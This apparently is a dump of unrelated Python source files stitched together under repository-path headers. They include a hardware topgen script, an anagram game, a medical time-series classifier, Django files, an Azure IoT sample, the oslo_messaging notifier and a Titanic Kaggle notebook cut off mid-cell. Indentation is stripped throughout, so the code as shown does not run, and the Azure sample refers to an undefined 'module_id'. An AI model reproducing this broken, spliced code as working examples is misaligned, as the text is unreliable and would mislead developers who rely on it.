"xbar_env_pkg__params.sv", "tb__xbar_connect.sv",
"tb__alert_handler_connect.sv"
]
for fname in tb_files:
tpl_fname = "%s.tpl" % (fname)
xbar_chip_data_path = TOPGEN_TEMPLATE_PATH / tpl_fname
template_contents = generate_top(completecfg, name_to_block,
str(xbar_chip_data_path))
rendered_dir = out_path / 'dv/autogen'
rendered_dir.mkdir(parents=True, exist_ok=True)
rendered_path = rendered_dir / fname
with rendered_path.open(mode='w', encoding='UTF-8') as fout:
fout.write(template_contents)
# generate parameters for chip-level environment package
tpl_fname = 'chip_env_pkg__params.sv.tpl'
alert_handler_chip_data_path = TOPGEN_TEMPLATE_PATH / tpl_fname
template_contents = generate_top(completecfg, name_to_block,
str(alert_handler_chip_data_path))
rendered_dir = out_path / 'dv/env/autogen'
rendered_dir.mkdir(parents=True, exist_ok=True)
rendered_path = rendered_dir / 'chip_env_pkg__params.sv'
with rendered_path.open(mode='w', encoding='UTF-8') as fout:
fout.write(template_contents)
if __name__ == "__main__":
main()
# --- djotaku/impracticalpython: Ch03/finding phrase anagrams/phrase_anagrams.py ---
import sys
from collections import Counter
import load_dictionary
dict_file = load_dictionary.load('words.txt')
# ensure "a" & "I" (both lowercase) are included
dict_file.append('a')
dict_file.append('I')
dict_file = sorted(dict_file)  # alphabetize the word list
ini_name = input("enter a name: ")
def find_anagrams(name, word_list):
"""Read name & dictionary file & display all anagrams IN name."""
name_letter_map = Counter(name)
anagrams = []
for word in word_list:
test = ''
word_letter_map = Counter(word.lower())
for letter in word:
if word_letter_map[letter] <= name_letter_map[letter]:
test += letter
if Counter(test) == word_letter_map:
anagrams.append(word)
print(*anagrams, sep='\n')
print()
print(f"Remaining letters = {name}")
print(f"Number of remaining letters = {len(name)}")
print(f"Number of remaining (real word) anagrams = {len(anagrams)}")
def process_choice(name):
"""Check user choice for validity, return choice & leftover letters."""
while True:
choice = input('\n Make a choice else Enter to start over or # to end: ')
if choice == '':
main()
elif choice == '#':
sys.exit()
else:
candidate = "".join(choice.lower().split())
left_over_list = list(name)
for letter in candidate:
if letter in left_over_list:
left_over_list.remove(letter)
if len(name) - len(left_over_list) == len(candidate):
break
else:
print("Won't work! Make another choice!", file=sys.stderr)
name = ''.join(left_over_list) # makes display more readable
return choice, name
def main():
"""Help user build anagram phrase from their name."""
name = "".join(ini_name.lower().split())
name = name.replace('-','')
limit = len(name)
phrase = ''
running = True
while running:
temp_phrase = phrase.replace(' ','')
if len(temp_phrase) < limit:
print(f"Length of anagram phrase = {len(temp_phrase)}")
find_anagrams(name, dict_file)
print(f"Current anagram phrase = {phrase}")
choice, name = process_choice(name)
phrase += choice + ' '
elif len(temp_phrase) == limit:
print("\n*******FINISHED!!!****\n")
print("Anagram of name =", end=" ")
print(phrase, file=sys.stderr)
print()
try_again = input('\n\nTry again? (Press Enter else "n" to quit)\n ')
if try_again.lower() == "n":
running = False
sys.exit()
else:
main()
if __name__ == '__main__':
main()
# --- andreeabea/AMDForecastingSystem: classification.py ---
import numpy as np
import pandas as pd
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.model_selection import KFold, cross_val_score, cross_val_predict
from tslearn.neighbors import KNeighborsTimeSeriesClassifier
from tslearn.svm import TimeSeriesSVC
from tslearn.utils import to_time_series_dataset
from data_processing.db_handler import DbHandler
from data_processing.timeseries_augmentation import TimeSeriesGenerator
from neural_networks.cnn import Cnn
from regression import TimeSeriesRegressor
from sklearn.metrics import confusion_matrix
import seaborn as sns
import matplotlib.pyplot as plt
class TimeSeriesClassifier:
def __init__(self, data):
self.data = data
self.gen = TimeSeriesGenerator(data)
def split_data(self):
labels = np.array(self.get_actual_labels())
mask = np.random.rand(len(labels)) < 0.8
trainY = labels[mask]
testY = labels[~mask]
i = 0
trainX = []
testX = []
for nb, group in self.data.groupby('ID'):
if mask[i] == 1:
trainX.append(group)
else:
testX.append(group)
i += 1
trainX = pd.concat(trainX)
testX = pd.concat(testX)
trainX = trainX.groupby('ID').apply(pd.DataFrame.to_numpy).to_numpy().tolist()
trainX = to_time_series_dataset(trainX)
testX = testX.groupby('ID').apply(pd.DataFrame.to_numpy).to_numpy().tolist()
testX = to_time_series_dataset(testX)
return trainX, trainY, testX, testY
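    # Note (illustrative): the boolean mask above gives an *approximate*
    # 80/20 split -- e.g. np.random.rand(5) < 0.8 might yield
    # [True, True, False, True, True]. For a reproducible split one could
    # seed NumPy first (an assumption, not in the original code):
    #
    #   np.random.seed(42)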
def get_actual_labels(self):
actual_labels = []
for nb, group in self.data.groupby('ID'):
actual_label = 0
if group['VA'].iloc[0] > group['VA'].iloc[group.shape[0] - 1]:
actual_label = 1
actual_labels.append(actual_label)
return actual_labels
def knn_classifier(self, nb_neighbors):
knn = KNeighborsTimeSeriesClassifier(n_neighbors=nb_neighbors, metric="dtw")
trainX, trainY, testX, testY = self.split_data()
knn = knn.fit(trainX, trainY)
print(knn.score(testX, testY))
conf_matrix = confusion_matrix(testY, knn.predict(testX))
sns.heatmap(conf_matrix, annot=True)
plt.show()
def svc_classifier(self):
print("Support vector classifier ...")
svc = TimeSeriesSVC(kernel="gak", gamma="auto", probability=True)
trainX, trainY, testX, testY = self.split_data()
print(svc.fit(trainX, trainY).score(testX, testY))
def gradient_boosted_classifier(self, include_timestamp=False, previous_visits=1, features='exclude VA'):
print("Gradient boosting classifier ...")
X, Y = self.gen.generate_timeseries(include_timestamp, previous_visits, features)
XwithVA, _ = self.gen.generate_timeseries(include_timestamp, previous_visits, 'all')
gbr = GradientBoostingClassifier()
# get VA distinct labels
# va_set = list(set(list(Y)))
# for i in range(len(Y)):
# for j in range(len(va_set)):
# if Y[i] == va_set[j]:
# Y[i] = j
# get VA distinct labels: good/bad evolution
for i in range(len(Y)):
if Y[i] > XwithVA[i][0]:
Y[i] = -1
else:
Y[i] = 1
cv = KFold(n_splits=10)
n_scores = cross_val_score(gbr, X, Y, cv=cv, n_jobs=-1)
print('Accuracy: ' + str(np.mean(n_scores)))
pred = cross_val_predict(gbr, X, Y, cv=cv, n_jobs=-1)
conf_matrix = confusion_matrix(Y, pred, labels=[-1, 1])
sns.heatmap(conf_matrix, annot=True, yticklabels=['Actual good evolution', 'Actual bad evolution'])
plt.show()
def cnn_classifier(self, include_timestamp=False, previous_visits=1, features='exclude VA'):
X, Y = self.gen.generate_timeseries(include_timestamp, previous_visits, features)
XwithVA, _ = self.gen.generate_timeseries(include_timestamp, previous_visits, 'all')
# get VA distinct labels: good/bad evolution
newY = np.array([])
for i in range(len(Y)):
if Y[i] > XwithVA[i][0]:
newY = np.append(newY, np.array([1, 0]))
else:
newY = np.append(newY, np.array([0, 1]))
newY = newY.reshape(-1, 2)
trainX, trainY, validX, validY, testX, testY = TimeSeriesRegressor.train_test_val_split(X, newY)
cnn = Cnn(trainX, trainY, validX, validY, testX, testY, nb_labels=2)
cnn.train()
cnn.evaluate_model()
if __name__ == '__main__':
#DatasetBuilder.write_all_data_to_csv("image_data.csv", datatype='images', include_timestamps=True)
include_timestamps = True
datatype = 'all'
db_handler = DbHandler(datatype, include_timestamps)
data = db_handler.get_data_from_csv()
ts_classifier = TimeSeriesClassifier(data)
ts_classifier.gradient_boosted_classifier(include_timestamps, 1, 'exclude VA')
ts_classifier.knn_classifier(2)
#ts_classifier.cnn_classifier(include_timestamps, 3, 'all')
# --- Avemik/my-first-blog: blog/migrations/0001_initial.py ---
# Generated by Django 2.2.5 on 2019-09-07 13:24
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
# --- ndirpaya/pyshop: products/views.py ---
from django.http import HttpResponse
from django.shortcuts import render
from .models import Product
def index(request):
products = Product.objects.all()
return render(request, 'index.html',
{'products': products})
def new(request):
return HttpResponse('New Products')
# --- adriananeci/azure-sdk-for-python: sdk/videoanalyzer/azure-media-videoanalyzer-edge/samples/sample_lva.py ---
import json
import os
from azure.media.videoanalyzeredge import *
from azure.iot.hub import IoTHubRegistryManager #run pip install azure-iot-hub to get this package
from azure.iot.hub.models import CloudToDeviceMethod, CloudToDeviceMethodResult
from datetime import time
device_id = "lva-sample-device"
module_d = "mediaEdge"
connection_string = "connectionString"
live_pipeline_name = "pipelineInstance1"
pipeline_topology_name = "pipelineTopology1"
url = "rtsp://sample-url-from-camera"
def build_pipeline_topology():
pipeline_topology_properties = PipelineTopologyProperties()
pipeline_topology_properties.description = "Continuous video recording to an Azure Media Services Asset"
user_name_param = ParameterDeclaration(name="rtspUserName",type="String",default="testusername")
password_param = ParameterDeclaration(name="rtspPassword",type="SecretString",default="testpassword")
url_param = ParameterDeclaration(name="rtspUrl",type="String",default="rtsp://www.sample.com")
hub_param = ParameterDeclaration(name="hubSinkOutputName",type="String")
source = RtspSource(name="rtspSource", endpoint=UnsecuredEndpoint(url="${rtspUrl}",credentials=UsernamePasswordCredentials(username="${rtspUserName}",password="${rtspPassword}")))
node = NodeInput(node_name="rtspSource")
sink = IotHubMessageSink("msgSink", node, "${hubSinkOutputName}")
pipeline_topology_properties.parameters = [user_name_param, password_param, url_param, hub_param]
pipeline_topology_properties.sources = [source]
pipeline_topology_properties.sinks = [sink]
pipeline_topology = PipelineTopology(name=pipeline_topology_name,properties=pipeline_topology_properties)
return pipeline_topology
def build_live_pipeline():
url_param = ParameterDefinition(name="rtspUrl", value=url)
pass_param = ParameterDefinition(name="rtspPassword", value="secret_password")
live_pipeline_properties = LivePipelineProperties(description="Sample description", topology_name=pipeline_topology_name, parameters=[url_param])
live_pipeline = LivePipeline(name=live_pipeline_name, properties=live_pipeline_properties)
return live_pipeline
def invoke_method_helper(method):
direct_method = CloudToDeviceMethod(method_name=method.method_name, payload=method.serialize())
registry_manager = IoTHubRegistryManager(connection_string)
    payload = registry_manager.invoke_device_module_method(device_id, module_id, direct_method).payload
if payload is not None and 'error' in payload:
print(payload['error'])
return None
return payload
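# Sketch of a call and its result (assumed shape -- the exact payload depends
# on the target module; the topology name below is hypothetical):
#
#   response = invoke_method_helper(PipelineTopologyGetRequest(name="top1"))
#   # -> a dict such as {"name": "top1", "properties": {...}}, or None on error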
def main():
pipeline_topology = build_pipeline_topology()
live_pipeline = build_live_pipeline()
try:
set_pipeline_top_response = invoke_method_helper(PipelineTopologySetRequest(pipeline_topology=pipeline_topology))
print(set_pipeline_top_response)
list_pipeline_top_response = invoke_method_helper(PipelineTopologyListRequest())
if list_pipeline_top_response:
list_pipeline_top_result = PipelineTopologyCollection.deserialize(list_pipeline_top_response)
get_pipeline_top_response = invoke_method_helper(PipelineTopologyGetRequest(name=pipeline_topology_name))
if get_pipeline_top_response:
get_pipeline_top_result = PipelineTopology.deserialize(get_pipeline_top_response)
set_live_pipeline_response = invoke_method_helper(LivePipelineSetRequest(live_pipeline=live_pipeline))
activate_pipeline_response = invoke_method_helper(LivePipelineActivateRequest(name=live_pipeline_name))
get_pipeline_response = invoke_method_helper(LivePipelineGetRequest(name=live_pipeline_name))
if get_pipeline_response:
get_pipeline_result = LivePipeline.deserialize(get_pipeline_response)
deactivate_pipeline_response = invoke_method_helper(LivePipelineDeactivateRequest(name=live_pipeline_name))
delete_pipeline_response = invoke_method_helper(LivePipelineDeleteRequest(name=live_pipeline_name))
delete_pipeline_response = invoke_method_helper(PipelineTopologyDeleteRequest(name=pipeline_topology_name))
except Exception as ex:
print(ex)
if __name__ == "__main__":
    main()
# --- dx-entity/env_parabola: lib/python2.7/site-packages/oslo_messaging/notify/notifier.py ---
# Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import logging
import uuid
from debtcollector import renames
from oslo_config import cfg
from oslo_utils import timeutils
import six
from stevedore import named
from oslo_messaging._i18n import _LE
from oslo_messaging import serializer as msg_serializer
from oslo_messaging import transport as msg_transport
_notifier_opts = [
cfg.MultiStrOpt('driver',
default=[],
deprecated_name='notification_driver',
deprecated_group='DEFAULT',
help='The Drivers(s) to handle sending notifications. '
'Possible values are messaging, messagingv2, '
'routing, log, test, noop'),
cfg.StrOpt('transport_url',
deprecated_name='notification_transport_url',
deprecated_group='DEFAULT',
secret=True,
help='A URL representing the messaging driver to use for '
'notifications. If not set, we fall back to the same '
'configuration used for RPC.'),
cfg.ListOpt('topics',
default=['notifications', ],
deprecated_opts=[
cfg.DeprecatedOpt('topics',
group='rpc_notifier2'),
cfg.DeprecatedOpt('notification_topics',
group='DEFAULT')
],
help='AMQP topic used for OpenStack notifications.'),
]
_LOG = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class Driver(object):
"""Base driver for Notifications"""
def __init__(self, conf, topics, transport):
"""base driver initialization
:param conf: configuration options
:param topics: list of topics
:param transport: transport driver to use
"""
self.conf = conf
self.topics = topics
self.transport = transport
@abc.abstractmethod
def notify(self, ctxt, msg, priority, retry):
"""send a single notification with a specific priority
:param ctxt: current request context
:param msg: message to be sent
:type msg: str
:param priority: priority of the message
:type priority: str
        :param retry: a connection retries configuration
None or -1 means to retry forever
0 means no retry
N means N retries
:type retry: int
"""
pass
def get_notification_transport(conf, url=None,
allowed_remote_exmods=None, aliases=None):
conf.register_opts(_notifier_opts,
group='oslo_messaging_notifications')
if url is None:
url = conf.oslo_messaging_notifications.transport_url
return msg_transport.get_transport(conf, url,
allowed_remote_exmods, aliases)
class Notifier(object):
"""Send notification messages.
The Notifier class is used for sending notification messages over a
messaging transport or other means.
Notification messages follow the following format::
{'message_id': six.text_type(uuid.uuid4()),
'publisher_id': 'compute.host1',
'timestamp': timeutils.utcnow(),
'priority': 'WARN',
'event_type': 'compute.create_instance',
'payload': {'instance_id': 12, ... }}
A Notifier object can be instantiated with a transport object and a
publisher ID:
notifier = messaging.Notifier(get_notification_transport(CONF),
'compute')
and notifications are sent via drivers chosen with the driver
config option and on the topics chosen with the topics config
option in [oslo_messaging_notifications] section.
Alternatively, a Notifier object can be instantiated with a specific
driver or topic::
transport = notifier.get_notification_transport(CONF)
notifier = notifier.Notifier(transport,
'compute.host',
driver='messaging',
topic='notifications')
Notifier objects are relatively expensive to instantiate (mostly the cost
of loading notification drivers), so it is possible to specialize a given
Notifier object with a different publisher id using the prepare() method::
notifier = notifier.prepare(publisher_id='compute')
notifier.info(ctxt, event_type, payload)
"""
@renames.renamed_kwarg('topic', 'topics',
message="Please use topics instead of topic",
version='4.5.0',
removal_version='5.0.0')
def __init__(self, transport, publisher_id=None,
driver=None, topic=None,
serializer=None, retry=None,
topics=None):
"""Construct a Notifier object.
:param transport: the transport to use for sending messages
:type transport: oslo_messaging.Transport
:param publisher_id: field in notifications sent, for example
'compute.host1'
:type publisher_id: str
:param driver: a driver to lookup from oslo_messaging.notify.drivers
:type driver: str
:param topic: the topic which to send messages on
:type topic: str
:param serializer: an optional entity serializer
:type serializer: Serializer
        :param retry: a connection retries configuration
None or -1 means to retry forever
0 means no retry
N means N retries
:type retry: int
:param topics: the topics which to send messages on
:type topics: list of strings
"""
conf = transport.conf
conf.register_opts(_notifier_opts,
group='oslo_messaging_notifications')
self.transport = transport
self.publisher_id = publisher_id
self.retry = retry
self._driver_names = ([driver] if driver is not None else
conf.oslo_messaging_notifications.driver)
if topics is not None:
self._topics = topics
elif topic is not None:
self._topics = [topic]
else:
self._topics = conf.oslo_messaging_notifications.topics
self._serializer = serializer or msg_serializer.NoOpSerializer()
self._driver_mgr = named.NamedExtensionManager(
'oslo.messaging.notify.drivers',
names=self._driver_names,
invoke_on_load=True,
invoke_args=[conf],
invoke_kwds={
'topics': self._topics,
'transport': self.transport,
}
)
_marker = object()
def prepare(self, publisher_id=_marker, retry=_marker):
"""Return a specialized Notifier instance.
Returns a new Notifier instance with the supplied publisher_id. Allows
sending notifications from multiple publisher_ids without the overhead
of notification driver loading.
:param publisher_id: field in notifications sent, for example
'compute.host1'
:type publisher_id: str
        :param retry: a connection retries configuration
None or -1 means to retry forever
0 means no retry
N means N retries
:type retry: int
"""
return _SubNotifier._prepare(self, publisher_id, retry=retry)
def _notify(self, ctxt, event_type, payload, priority, publisher_id=None,
retry=None):
payload = self._serializer.serialize_entity(ctxt, payload)
ctxt = self._serializer.serialize_context(ctxt)
msg = dict(message_id=six.text_type(uuid.uuid4()),
publisher_id=publisher_id or self.publisher_id,
event_type=event_type,
priority=priority,
payload=payload,
timestamp=six.text_type(timeutils.utcnow()))
def do_notify(ext):
try:
ext.obj.notify(ctxt, msg, priority, retry or self.retry)
except Exception as e:
_LOG.exception(_LE("Problem '%(e)s' attempting to send to "
"notification system. Payload=%(payload)s"),
dict(e=e, payload=payload))
if self._driver_mgr.extensions:
self._driver_mgr.map(do_notify)
def audit(self, ctxt, event_type, payload):
"""Send a notification at audit level.
:param ctxt: a request context dict
:type ctxt: dict
:param event_type: describes the event, for example
'compute.create_instance'
:type event_type: str
:param payload: the notification payload
:type payload: dict
:raises: MessageDeliveryFailure
"""
self._notify(ctxt, event_type, payload, 'AUDIT')
def debug(self, ctxt, event_type, payload):
"""Send a notification at debug level.
:param ctxt: a request context dict
:type ctxt: dict
:param event_type: describes the event, for example
'compute.create_instance'
:type event_type: str
:param payload: the notification payload
:type payload: dict
:raises: MessageDeliveryFailure
"""
self._notify(ctxt, event_type, payload, 'DEBUG')
def info(self, ctxt, event_type, payload):
"""Send a notification at info level.
:param ctxt: a request context dict
:type ctxt: dict
:param event_type: describes the event, for example
'compute.create_instance'
:type event_type: str
:param payload: the notification payload
:type payload: dict
:raises: MessageDeliveryFailure
"""
self._notify(ctxt, event_type, payload, 'INFO')
def warn(self, ctxt, event_type, payload):
"""Send a notification at warning level.
:param ctxt: a request context dict
:type ctxt: dict
:param event_type: describes the event, for example
'compute.create_instance'
:type event_type: str
:param payload: the notification payload
:type payload: dict
:raises: MessageDeliveryFailure
"""
self._notify(ctxt, event_type, payload, 'WARN')
warning = warn
def error(self, ctxt, event_type, payload):
"""Send a notification at error level.
:param ctxt: a request context dict
:type ctxt: dict
:param event_type: describes the event, for example
'compute.create_instance'
:type event_type: str
:param payload: the notification payload
:type payload: dict
:raises: MessageDeliveryFailure
"""
self._notify(ctxt, event_type, payload, 'ERROR')
def critical(self, ctxt, event_type, payload):
"""Send a notification at critical level.
:param ctxt: a request context dict
:type ctxt: dict
:param event_type: describes the event, for example
'compute.create_instance'
:type event_type: str
:param payload: the notification payload
:type payload: dict
:raises: MessageDeliveryFailure
"""
self._notify(ctxt, event_type, payload, 'CRITICAL')
def sample(self, ctxt, event_type, payload):
"""Send a notification at sample level.
Sample notifications are for high-frequency events
        that typically contain small payloads, e.g. "CPU = 70%".
Not all drivers support the sample level
(log, for example) so these could be dropped.
:param ctxt: a request context dict
:type ctxt: dict
:param event_type: describes the event, for example
'compute.create_instance'
:type event_type: str
:param payload: the notification payload
:type payload: dict
:raises: MessageDeliveryFailure
"""
self._notify(ctxt, event_type, payload, 'SAMPLE')
class _SubNotifier(Notifier):
_marker = Notifier._marker
def __init__(self, base, publisher_id, retry):
self._base = base
self.transport = base.transport
self.publisher_id = publisher_id
self.retry = retry
self._serializer = self._base._serializer
self._driver_mgr = self._base._driver_mgr
def _notify(self, ctxt, event_type, payload, priority):
super(_SubNotifier, self)._notify(ctxt, event_type, payload, priority)
@classmethod
def _prepare(cls, base, publisher_id=_marker, retry=_marker):
if publisher_id is cls._marker:
publisher_id = base.publisher_id
if retry is cls._marker:
retry = base.retry
return cls(base, publisher_id, retry=retry)
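# A minimal usage sketch (hypothetical transport and context values, not part of
# this module), showing how prepare() derives a per-publisher notifier without
# reloading the notification drivers:
#
#     notifier = Notifier(transport, publisher_id='compute.host1')
#     notifier.info({}, 'compute.create_instance', {'instance_id': 42})
#     sub = notifier.prepare(publisher_id='compute.host2')
#     sub.warn({}, 'compute.delete_instance', {'instance_id': 42})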
#!/usr/bin/env python
# coding: utf-8
# # Titanic: A Pragmatic Approach
# > Not intended to be read by the absolute beginner.
#
# Overview of the problem: https://www.kaggle.com/c/titanic
#
# 
#
# ### Acknowledgments
# This notebook has been heavily influenced by those *great* contributions:
# * [A Data Science Framework: To Achieve 99% Accuracy](https://www.kaggle.com/ldfreeman3/a-data-science-framework-to-achieve-99-accuracy/code) by LD Freeman
# * [Titanic Top 4% with ensemble modeling](https://www.kaggle.com/yassineghouzam/titanic-top-4-with-ensemble-modeling) by Yassine Ghouzam
# * [Titanic: 2nd degree families and majority voting](https://www.kaggle.com/erikbruin/titanic-2nd-degree-families-and-majority-voting) by Erik Bruin
# * [Pytanic](https://www.kaggle.com/headsortails/pytanic/code) by Heads or Tails
# * [Divide and Conquer [0.82296]](https://www.kaggle.com/pliptor/divide-and-conquer-0-82296) by Oscar Takeshita
# * [Titanic [0.82] - [0.83]](https://www.kaggle.com/konstantinmasich/titanic-0-82-0-83) by Konstantin
# ## Our data science workflow
# * [**Step 1:** Defining the problem (description and objective)](#step1)
# * [**Step 2:** Gathering the data (automatic downloading)](#step2)
# * [**Step 3:** Performing exploratory data analysis (visualizing data, getting intuition)](#step3)
# * [**Step 4:** Preparing the data for consumption (data cleaning, feature engineering)](#step4)
# * [**Step 5:** Modeling the data (machine learning algorithms, optimizations)](#step5)
# * [**Step 6:** Drawing conclusions](#step6)
# ## Step 1: Defining the problem <a id="step1"></a>
#
# ### Kaggle description (as is)
# The sinking of the RMS Titanic is one of the most infamous shipwrecks in history. On April 15, 1912, during her maiden voyage, the Titanic sank after colliding with an iceberg, killing 1502 out of 2224 passengers and crew. This sensational tragedy shocked the international community and led to better safety regulations for ships.
#
# One of the reasons that the shipwreck led to such loss of life was that there were not enough lifeboats for the passengers and crew. Although there was some element of luck involved in surviving the sinking, some groups of people were more likely to survive than others, such as women, children, and the upper-class.
#
# In this challenge, we ask you to complete the analysis of what sorts of people were likely to survive. In particular, we ask you to apply the tools of machine learning to predict which passengers survived the tragedy.
#
# ### Objective
# Predict who survived and who did not during the Titanic disaster, based on the features collected for us in the dataset: **BINARY CLASSIFICATION PROBLEM**.
#
# #### Dataset
#
# We denote our *dataset* by $(X,Y) \in \chi^m \times \{0,1\}^m$ where :
# * $\chi$ is an abstract space of feature vectors
# * $X = (x_1, ..., x_m)$ is our vector of $m$ *feature vectors* where $x_i = (x_1^{(i)},...,x_n^{(i)})$
# * $Y = (y_1, ..., y_m)$ is our vector of labels
#
# #### Goal
#
# We wish to find a good *classifier* $h$ mapping a vector in the abstract feature space to a binary output:
# $$\begin{align*}
# h \colon \chi &\to \{0,1\}\\
# x &\mapsto y
# \end{align*}$$
#
# *"good"* means we want to have a low *classification error (risk)* $\mathcal{R}(h) = \mathrm{P}(h(x) \neq y)$.
#
# #### Hidden goal
#
# $y$ is distributed according to a *Bernoulli distribution* ($y \in \{0,1\}$), so we write $y|x \sim \mathrm{Bernoulli}(\eta(x))$, where $\eta(x) = \mathrm{P}(y=1|x) = \mathrm{E}(y|x)$.
#
# The problem is that we don't have access to the distribution of $y|x$, which makes it impossible to construct the perfect (Bayes) classifier $h^*(x) = \mathbb{1}\{\eta(x) > 1/2\}$ directly. Our goal is then not only to find a good classifier, but also to transform $x$ so that $y|x$ has a more predictable distribution for a potentially good classifier. In other words, we want our model to have good generalization capabilities, so we will apply a combination of transformations to our dataset $X$.
#
# $X$ will then be mapped to a dataset $\widetilde{X}$ in a different feature space $\widetilde{\chi} \simeq [0,1]^n$.
#
# For a more in-depth look at binary classification, feel free to read those notes: https://ocw.mit.edu/courses/mathematics/18-657-mathematics-of-machine-learning-fall-2015/lecture-notes/MIT18_657F15_L2.pdf.
# ## Step 2: Gathering the data <a id="step2"></a>
# The data is available online as 3 CSV files at [https://www.kaggle.com/c/titanic/data](https://www.kaggle.com/c/titanic/data).
#
# Let's download them automatically.
# In[ ]:
import os
from pathlib import Path
import subprocess
# Create the input directory if it doesn't exist
if not os.path.exists('../input'):
os.makedirs('../input')
file_on_disk = True
# Check if the files are on disk before download
for file in os.listdir('../input'):
if not Path('../input/' + file).is_file():
# The file is not on disk
file_on_disk = False
break
if not file_on_disk:
# Download the files with your API token in ~/.kaggle
error = subprocess.call('kaggle competitions download -c titanic -p ../input'.split())
if not error:
print('Files downloaded successfully.')
else:
print('An error occurred during donwload, check your API token.')
else:
print('Files are already on disk.')
# ## Step 3: Performing exploratory data analysis <a id="step3"></a>
#
# Kaggle provides both **train** and **test** sets; we will perform EDA on each of them.
#
# ### 3.1. Import libraries
#
# **Visualization** is `matplotlib`/`seaborn` based, **data preprocessing** is essentially `pandas` based, and **modelling** is mostly `scikit-learn` based.
# In[ ]:
# Load packages
print('Python packages:')
print('-'*15)
import sys
print('Python version: {}'. format(sys.version))
import pandas as pd
print('pandas version: {}'. format(pd.__version__))
import matplotlib
print('matplotlib version: {}'. format(matplotlib.__version__))
import numpy as np
print('NumPy version: {}'. format(np.__version__))
import scipy as sp
print('SciPy version: {}'. format(sp.__version__))
import IPython
from IPython import display
print('IPython version: {}'. format(IPython.__version__))
import sklearn
print('scikit-learn version: {}'. format(sklearn.__version__))
# Miscsellaneous libraries
import random
import time
# Ignore warnings
import warnings
warnings.filterwarnings('ignore')
print('')
# Check the input directory
print('Input directory: ')
print('-'*15)
from subprocess import check_output
print(check_output(['ls', '../input']).decode('utf8'))
# ### 3.2. Load the data modelling libraries
# In[ ]:
# Common model algorithms
from sklearn import neighbors, ensemble
from xgboost import XGBClassifier
import lightgbm as lgb
from catboost import CatBoostClassifier
# Common model helpers
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import LabelEncoder, StandardScaler
from sklearn import model_selection
# Visualization
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.pylab as pylab
from matplotlib.ticker import PercentFormatter
import seaborn as sns
# Configure visualization defaults
get_ipython().magic(u'matplotlib inline')
mpl.style.use('ggplot')
sns.set_style('white')
palette = sns.color_palette('Set2', 10)
pylab.rcParams['figure.figsize'] = 18,4
# ### 3.3 Meet the data
#
# The dataset is briefly described here: [https://www.kaggle.com/c/titanic/data](https://www.kaggle.com/c/titanic/data)
#
# It is composed of **11 independent variables** and **1 dependent variable**.
#
# **Variable description**
#
# |Variable|Definition|Key|Type|
# |--------|----------|---|----|
# |**Survived**|Survival|0 = No, 1 = Yes|**CATEGORICAL**|
# |**Pclass**|Ticket class|1 = 1st, 2 = 2nd, 3 = 3rd|**ORDINAL**|
# |**Name**|Passenger's name|N/A|**MIXED**|
# |**Sex**|Passenger's sex|N/A|**CATEGORICAL**|
# |**Age**|Passenger's age|N/A|**CONTINUOUS**|
# |**SibSp**|# of siblings / spouses aboard the Titanic|N/A|**DISCRETE**|
# |**Parch**|# of parents / children aboard the Titanic|N/A|**DISCRETE**|
# |**Ticket**|Ticket number|N/A|**MIXED**|
# |**Fare**|Passenger fare|N/A|**CONTINUOUS**|
# |**Cabin**|Cabin number|N/A|**MIXED**|
# |**Embarked**|Port of embarkation|C = Cherbourg, Q = Queenstown, S = Southampton|**CATEGORICAL**|
# In[ ]:
train_df = pd.read_csv('../input/train.csv').set_index(keys='PassengerId', drop=True)
test_df = pd.read_csv('../input/test.csv').set_index(keys='PassengerId', drop=True)
# Useful for more accurate feature engineering
data_df = train_df.append(test_df)
# #### Samples
# In[ ]:
train_df.sample(10)
# #### Simple statistics from the train set
# 891 samples.
# In[ ]:
train_df.describe(include = 'all')
# #### Simple statistics from the test set
# 418 samples.
# In[ ]:
test_df.describe(include = 'all')
# 891 samples to predict the outcome of 418 samples is a pretty bad ratio (about 2.13): there is a high risk of overfitting the train set.
# ### 3.4 Missing data
# Let's have a quick look at missing data on both sets.
# In[ ]:
def plot_missing_values(dataset):
"""
Plots the proportion of missing values per feature of a dataset.
:param dataset: pandas DataFrame
"""
missing_data_percent = [x / len(dataset) for x in dataset.isnull().sum()]
data_percent = [1 - x for x in missing_data_percent]
fig, axs = plt.subplots(1,1,figsize=(18,4))
plt.bar(dataset.columns.values, data_percent, color='#84B044', linewidth=0)
plt.bar(dataset.columns.values, missing_data_percent, bottom=data_percent, color='#E76C5D', linewidth=0)
axs.yaxis.set_major_formatter(PercentFormatter(xmax=1))
# #### Train set
# In[ ]:
train_df.isnull().sum().to_frame('Missing values').transpose()
# In[ ]:
plot_missing_values(train_df)
# #### Test set
# In[ ]:
test_df.isnull().sum().to_frame('Missing values').transpose()
# In[ ]:
plot_missing_values(test_df)
# `Age` and `Cabin` have quite a lot of missing values in both datasets; we will have to deal with those later.
# ### 3.5 Exploring numerical features
# Let's plot the **Pearson's correlation matrix** of the raw numerical features to get a sense of linear correlations between them.
#
# The coefficients of the matrix for variables $X$ and $Y$ are computed as follows:
#
# $$\rho _{X,Y}={\frac {\operatorname {cov} (X,Y)}{\sigma _{X}\sigma _{Y}}}={\frac {\operatorname {E} [(X-\mu _{X})(Y-\mu _{Y})]}{\sigma _{X}\sigma _{Y}}}$$
#
# It means that variables show a strong linear correlation if the absolute value of the coefficient is close to one.
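# As a quick sanity check (illustrative only, not part of the original analysis), a single coefficient can also be computed directly with pandas:

# In[ ]:


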